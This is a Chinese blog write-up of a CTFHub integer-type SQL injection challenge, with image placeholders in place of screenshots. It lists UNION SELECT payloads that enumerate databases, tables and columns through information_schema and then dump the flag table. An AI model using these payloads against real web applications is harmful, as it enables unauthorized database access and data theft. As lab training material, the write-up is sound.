CTFHUB-整数型SQL注入

CTFHUB-整数型SQL注入

CTFHUB-整数型SQL注入_第1张图片根据提示输入1后发现页面回显并且url改变。由题可知此题为整数型注入
在这里插入图片描述

CTFHUB-整数型SQL注入_第2张图片使用order by语句查询字段数
CTFHUB-整数型SQL注入_第3张图片CTFHUB-整数型SQL注入_第4张图片参数为3时不回显,说明字段数为2

使用union联合查询检测信息回显位置

id=1 union select 1,2

CTFHUB-整数型SQL注入_第5张图片由于页面只允许返回一行内容,所以我们修改参数1为-1,使需要查询的信息回返

id=-1 union select 1,2

CTFHUB-整数型SQL注入_第6张图片

id=-1 union select 1,database()

获取当前数据库名
CTFHUB-整数型SQL注入_第7张图片id=-1 union select 1,group_concat(schema_name)from information_schema.schemata
获取所有数据库名
在这里插入图片描述

d=-1 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'

查询数据库sqli表名
在这里插入图片描述

union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'

获取flag列所有字段名
在这里插入图片描述获取指定数据库的表的列的内容

union select 1,group_concat(flag) from sqli.flag

在这里插入图片描述

你可能感兴趣的:(CTFHUB-整数型SQL注入)